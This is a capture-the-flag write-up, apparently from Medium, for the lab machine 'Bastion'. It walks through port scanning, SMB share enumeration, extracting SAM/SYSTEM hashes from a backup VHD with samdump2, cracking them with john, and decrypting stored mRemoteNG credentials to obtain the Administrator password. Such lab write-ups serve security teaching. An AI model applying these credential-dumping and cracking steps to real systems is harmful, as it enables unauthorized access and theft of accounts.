$ nmap -sV -sC -p-
Nmap scan report for
Host is up (0.23s latency).
Not shown: 65522 closed ports
open ssh
OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
open msrpc
Microsoft Windows RPC
open netbios-ssn Microsoft Windows netbios-ssn
open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http
Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http
Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc
Microsoft Windows RPC49665/tcp open msrpc
Microsoft Windows RPC
49666/tcp open msrpc
Microsoft Windows RPC
49667/tcp open msrpc
Microsoft Windows RPC
49668/tcp open msrpc
Microsoft Windows RPC
49669/tcp open msrpc
Microsoft Windows RPC
49670/tcp open msrpc
Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
Host script results:
|_clock-skew: mean: -39m47s, deviation: 1h09m13s, median: 10s
| smb-os-discovery:
OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
Computer name: Bastion
NetBIOS computer name: BASTION\x00
Workgroup: WORKGROUP\x00
|_ System time: 2019-05-23T11:30:14+02:00
| smb-security-mode:
account_used: guest
authentication_level: user
challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
Message signing enabled but not required
| smb2-time:
date: 2019-05-23 09:30:13
|_ start_date: 2019-05-23 05:46:29

so here we can see that we are having a smb port open

so let’s look what are we having in smb

$ smbclient -L

here we are getting 4 shares , after enumerating we found that there are some sensitive files at Backups share

here at WindowsImageBackup we found a VHD file (VIRTUAL HARD DISK)

after opening the VDH file at windows operating system

To attach the VHD follow the steps

  1. right click on Computer/This PC and click Manage.
  2. move to Disk Management right click on it.
  3. select attach VHD .
  4. give the location of VHD and press enter.
Location — (\\\Backups\WindowsImageBackup\\L4mpje-PC\Backup 2019–02–22 124351\9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd)

After getting access to file search for config files such as SAM and SYSTEM files

Getting files at “C:\Windows\System32\Config”

We copied SAM and SYSTEM file to our system

Then we used samdump2 tool to extract the files hashes in user readable form

$ samdump2 SAM SYSTEM > hash.txt 

both the files are encrypted to we crack the SAM and SYSTEM file hash using john the ripper tool

$ john --format=NT --wordlist=/usr/share/wordlist/rockyou.txt hash.txt

After decryption of hashes we found the plain password as

So here we found L4mpje user creds

Using ssh we found user.txt

Then after further enumerating we got to see mRemoteNG

mremoteng — mRemote stores connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves the passwords in an encrypted format

So this can be our key for privilege escalation to root

Here we got files of mRemoteNG config files

After this we installed mRemoteNG application to our windows machine

Steps for privilege escalation

  1. On looking inside C:\Program Files\ found a Installed program mRemoteng
  2. On searching found a vulnerability for this Program that the credentials can be disclosed
  3. The file C:\Users\AppData\Roaming\mRemoteNG\confcons.xml holds the encrypted credentials, copied the file to my system
λ scp.exe L4mpje@\Users\L4mpje\AppData\Roaming\mRemoteng\confcons.xml .

4. Installed the mRemoteng from in my system
5. On top right corner click File>Open Connection File and select the copied confcons.xml file
5. Create a new external tool, Click on tools at top right corner and right click on External tools and select New External tools
6. In display name fill whatever you want the name, in filename type cmd, in Argument type “/k echo %password%”
7. Right click on the connection DC and in External tools select the one you created
8. A command prompt will pop up and will show you the password for Administrator
9. login to ssh with Administrator:thXLHM96BeKL0ER2



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store